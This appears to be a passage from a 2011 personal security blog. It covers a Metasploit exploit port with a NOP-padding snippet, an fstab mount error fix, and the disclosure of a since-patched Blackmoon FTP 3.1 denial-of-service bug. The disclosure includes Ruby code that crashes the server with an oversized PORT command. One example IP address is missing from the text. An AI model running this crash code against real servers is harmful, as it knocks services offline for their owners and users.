@bannedit ported our exploit to Metasploit yesterday. His version is certainly much more elegant than ours. He managed to make it reliable with this little piece of code:

if datastore['RHOST'].length < 15
  # make up the difference with NOPs so the total buffer length is constant
  pad = make_nops(1) * (15 - datastore['RHOST'].length)
end

An IPv4 address is at most 15 bytes long, including the dots. For example, "" is 13 bytes, so 15 - 13 = 2 more NOPs. We did all the work for him but failed to see the pattern! Oh well, at least it is in the framework now!

Sunday, January 16, 2011

mount: unknown filesystem type 'HPFS/NTFS'

I ran into this error when I tried to set my external hard drive to automatically mount to the same mount point on every reboot. First, I went into the disk utility in Ubuntu and got the file system type which was HPFS/NTFS. I got my UUID and entered this line into my fstab file:
UUID=b3a0378a-c352-47fe-ac88-cf2a9d815e13 /media/Backup  HPFS/NTFS defaults 0 0

Then, I ran mount -a to remount everything in my fstab file but ran into this error:
mount: unknown filesystem type 'HPFS/NTFS'

I couldn't find a solution anywhere on the Internet but then remembered I set this drive to the ext4 file system when I formatted it. I changed my fstab file to reflect that:
UUID=b3a0378a-c352-47fe-ac88-cf2a9d815e13 /media/Backup ext4 defaults 0 0

After re-running mount -a everything worked.
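In hindsight, a quicker way to get both the UUID and the exact type string fstab expects is blkid (the device name here is just an example):

```
sudo blkid /dev/sdb1
```

On my drive that would have reported TYPE="ext4" instead of the HPFS/NTFS partition label the Disk Utility showed.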

Friday, January 14, 2011

Blackmoon FTP 3.1 Denial of Service Exploit

I found an exploit and had it published to exploit-db. It is a denial of service for the Blackmoon FTP 3.1 Server (Builds 1735 and 1736). The PORT command is not properly sanitized and sending a buffer of 600 bytes crashes the application.

When the Blackmoon FTP Server is installed, it sets the Blackmoon FTP service to automatically restart in the event of a failure. This was a little confusing because I could see the application crash, but the FTP service would still respond to my requests. Turning the service recovery feature off enabled me to find the DoS. Because neither EIP nor SEH is overwritten, it's not likely to be anything more than a nuisance.

I contacted the vendor and they fixed the issue within a few weeks. Build 1737 is the latest build that incorporates their fix.
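For reference, the trigger boils down to a few lines of Ruby (a sketch under my assumptions, not the published exploit; the host and credentials are placeholders, and it should only ever be pointed at a server you own):

```ruby
require 'socket'

# Build the malformed PORT command: a 600-byte buffer where the
# host/port tuple should be, which crashes Blackmoon FTP 3.1.
def build_port_payload(len = 600)
  "PORT " + "A" * len + "\r\n"
end

# Log in and fire the payload (test servers only!).
def crash_blackmoon(host, port = 21)
  s = TCPSocket.new(host, port)
  s.gets                                 # banner
  s.write("USER anonymous\r\n"); s.gets
  s.write("PASS test\r\n");      s.gets
  s.write(build_port_payload)
  s.close
end
```

Remember to disable the service recovery feature first, or Windows will quietly restart the service and hide the crash.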